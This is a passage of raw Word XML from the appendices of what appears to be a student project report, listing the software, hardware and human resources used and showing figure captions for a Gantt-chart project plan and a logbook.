                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2EA050C4" w14:textId="24F3989A" w:rsidR="000E1F3C" w:rsidRDefault="00F52DD4" w:rsidP="00F52DD4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc86859313"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDICES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="2C1B6CB9" w14:textId="277F0444" w:rsidR="00F52DD4" w:rsidRDefault="00601B2D" w:rsidP="00601B2D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc86859314"/>
      <w:r>
        <w:t>Project management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="4ED37B3F" w14:textId="15003C29" w:rsidR="00F40655" w:rsidRDefault="00E6672C" w:rsidP="00E6672C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc86859315"/>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="4510AF76" w14:textId="200D276A" w:rsidR="00E6672C" w:rsidRDefault="00424442" w:rsidP="00E6672C">
      <w:r>
        <w:t xml:space="preserve">The project has used </w:t>
      </w:r>
      <w:r w:rsidR="00E460C3">
        <w:t>various resources</w:t>
      </w:r>
      <w:r w:rsidR="00C3156C">
        <w:t xml:space="preserve"> as listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADE3C0" w14:textId="11A94442" w:rsidR="00C3156C" w:rsidRDefault="00C021D1" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C021D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Software resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC539F" w14:textId="18F6F3A5" w:rsidR="00C021D1" w:rsidRDefault="00EF670D" w:rsidP="00E6672C">
      <w:r>
        <w:t>Docker, Ubuntu, Microsoft office</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDC62D" w14:textId="397657E4" w:rsidR="004E1657" w:rsidRDefault="004E1657" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1657">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hardware used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1688F8" w14:textId="753BB6AA" w:rsidR="004E1657" w:rsidRDefault="004E1657" w:rsidP="00E6672C">
      <w:r>
        <w:t>HP laptop with Ubuntu OS installed</w:t>
      </w:r>
      <w:r w:rsidR="0080374E">
        <w:t xml:space="preserve"> and phone</w:t>
      </w:r>
      <w:r w:rsidR="004D1ADA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70597A9C" w14:textId="42F88669" w:rsidR="004E1657" w:rsidRDefault="007466A9" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007466A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Human resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53493CDD" w14:textId="5D57973F" w:rsidR="007466A9" w:rsidRDefault="006F58CC" w:rsidP="00E6672C">
      <w:r>
        <w:t xml:space="preserve">Yohannes Zerzghi, project supervisor </w:t>
      </w:r>
      <w:r w:rsidR="007F23D3">
        <w:t>Dr Carlene Campbell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045234CA" w14:textId="03BC1000" w:rsidR="007F23D3" w:rsidRDefault="00C67336" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67336">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Other resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE7084" w14:textId="7B19B900" w:rsidR="00C67336" w:rsidRDefault="00354AA1" w:rsidP="00E6672C">
      <w:r>
        <w:t xml:space="preserve">Internet, google scholar, IEEE </w:t>
      </w:r>
      <w:r w:rsidR="0080374E">
        <w:t>explorer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB1CB4" w14:textId="68A07CA6" w:rsidR="00AC592A" w:rsidRDefault="00AC592A" w:rsidP="00AC592A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc86859316"/>
      <w:r>
        <w:t>Project planning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAE1F1" w14:textId="45F7FBC4" w:rsidR="00AC592A" w:rsidRDefault="00F063E0" w:rsidP="00AC592A">
      <w:r>
        <w:t xml:space="preserve">For this project, Gantt chart was used to </w:t>
      </w:r>
      <w:r w:rsidR="00943860">
        <w:t>track and plan the progress of each task. The project is di</w:t>
      </w:r>
      <w:r w:rsidR="001B431A">
        <w:t xml:space="preserve">vided into three </w:t>
      </w:r>
      <w:r w:rsidR="00AB0510">
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidR="001B431A">
        <w:t>sections</w:t>
      </w:r>
      <w:r w:rsidR="00170227">
        <w:t xml:space="preserve"> containing Literature review, </w:t>
      </w:r>
      <w:r w:rsidR="00C55E89">
        <w:t>design and imp</w:t>
      </w:r>
      <w:r w:rsidR="00B31E02">
        <w:t>lementation, testing and experimenting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55826E56" w14:textId="31A48DCE" w:rsidR="00B62574" w:rsidRDefault="00B62574" w:rsidP="00B62574">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46581B54" wp14:editId="61F1D723">
            <wp:extent cx="5359400" cy="3194501"/>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59984" cy="3194849"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0E610" w14:textId="3C2BA37B" w:rsidR="00B62574" w:rsidRPr="00EA04CD" w:rsidRDefault="00FB6C9E" w:rsidP="00EA04CD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc86858660"/>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00267DD2" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009538A6" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sample Gantt chart with </w:t>
      </w:r>
      <w:r w:rsidR="002917B1" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all the tasks.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="2ED568F1" w14:textId="3F7D865A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="4D97F27A" w14:textId="14259A66" w:rsidR="00781B44" w:rsidRDefault="00781B44" w:rsidP="00B62574">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC3D969" wp14:editId="05192B73">
            <wp:extent cx="5621930" cy="22479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621930" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0F727" w14:textId="25AE7C2B" w:rsidR="00FB6C9E" w:rsidRDefault="00FB6C9E" w:rsidP="00EA04CD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc86858661"/>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002917B1" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EA04CD" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the project plan with Gantt chart.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="79C35DFA" w14:textId="56F94677" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="34112CCE" w14:textId="11F0B20E" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="59EB870B" w14:textId="3BA8A789" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="502FF3E2" w14:textId="5AABF905" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="127D1F71" w14:textId="77777777" w:rsidR="00945B0A" w:rsidRPr="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="1C358906" w14:textId="7255EB84" w:rsidR="00153BD6" w:rsidRPr="00153BD6" w:rsidRDefault="00153BD6" w:rsidP="00153BD6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc86859317"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00D2185A">
        <w:t>og</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="2A6AC213" w14:textId="538BC88A" w:rsidR="00093277" w:rsidRDefault="001018D6" w:rsidP="00B41D3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65447EB4" wp14:editId="54F6C0AD">
            <wp:extent cx="4972050" cy="4065336"/>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73253" cy="4066320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3499463A" w14:textId="14DA26F0" w:rsidR="00A53E61" w:rsidRPr="00360732" w:rsidRDefault="00A53E61" w:rsidP="00360732">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc86858662"/>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>71</w:t>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00AB77E0" w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00360732" w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Logbook</w:t>
      </w:r>
      <w:r w:rsidR="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="17EE8B19" w14:textId="77777777" w:rsidR="00922EAC" w:rsidRPr="00922EAC" w:rsidRDefault="00922EAC" w:rsidP="00922EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB98B86" w14:textId="77777777" w:rsidR="008B1D23" w:rsidRDefault="008B1D23" w:rsidP="0008759F"/>
    <w:p w14:paraId="043C081D" w14:textId="77777777" w:rsidR="0096369A" w:rsidRPr="00061A8B" w:rsidRDefault="0096369A" w:rsidP="0008759F"/>
    <w:p w14:paraId="4BCA735D" w14:textId="77777777" w:rsidR="004C2F14" w:rsidRPr="004C2F14" w:rsidRDefault="004C2F14" w:rsidP="004C2F14"/>
    <w:p w14:paraId="77DC403A" w14:textId="77777777" w:rsidR="00125B77" w:rsidRPr="00125B77" w:rsidRDefault="00125B77" w:rsidP="00125B77"/>
    <w:p w14:paraId="34C4CEC3" w14:textId="77777777" w:rsidR="00BD617D" w:rsidRPr="00E84EBF" w:rsidRDefault="00BD617D" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="52710697" w14:textId="77777777" w:rsidR="004D0FCC" w:rsidRPr="004D0FCC" w:rsidRDefault="004D0FCC" w:rsidP="004D0FCC"/>
    <w:sectPr w:rsidR="004D0FCC" w:rsidRPr="004D0FCC">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FB830" w14:textId="77777777" w:rsidR="009860F6" w:rsidRDefault="009860F6" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50167024" w14:textId="77777777" w:rsidR="009860F6" w:rsidRDefault="009860F6" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="2AFBC065" w14:textId="77777777" w:rsidR="009860F6" w:rsidRDefault="009860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729343"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="5FBD1BAD" w14:textId="2C2ED761" w:rsidR="00CB6F42" w:rsidRDefault="00CB6F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78067E" w14:textId="77777777" w:rsidR="00CB6F42" w:rsidRDefault="00CB6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797FC" w14:textId="77777777" w:rsidR="009860F6" w:rsidRDefault="009860F6" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54971A38" w14:textId="77777777" w:rsidR="009860F6" w:rsidRDefault="009860F6" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="7B9201AD" w14:textId="77777777" w:rsidR="009860F6" w:rsidRDefault="009860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2A09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="959E5A82"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHAPTER %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="357" w:hanging="3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714" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1071" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="1.111%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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06883420"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F07E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16207"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C0E2B4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHAPTER %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="357" w:hanging="3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714" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1071" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="1.111%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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BA03250"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF58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9AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F36B6A0"/>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180E01AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F3868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98533C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5565962"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHAPTER %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="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ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading4"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="1.1.1.1."/>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246F71A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3932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733FC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D46DA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E07120"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="506E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11F86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDBA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621E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C77E8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2474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3041"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C862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F7667"/>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43960E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8B6511"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58D0A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542B8B"/>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68F375C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7104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766B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A66E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7231DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7FA50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91788"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04FE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B257F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76DE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204373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A62EA9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lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1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3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
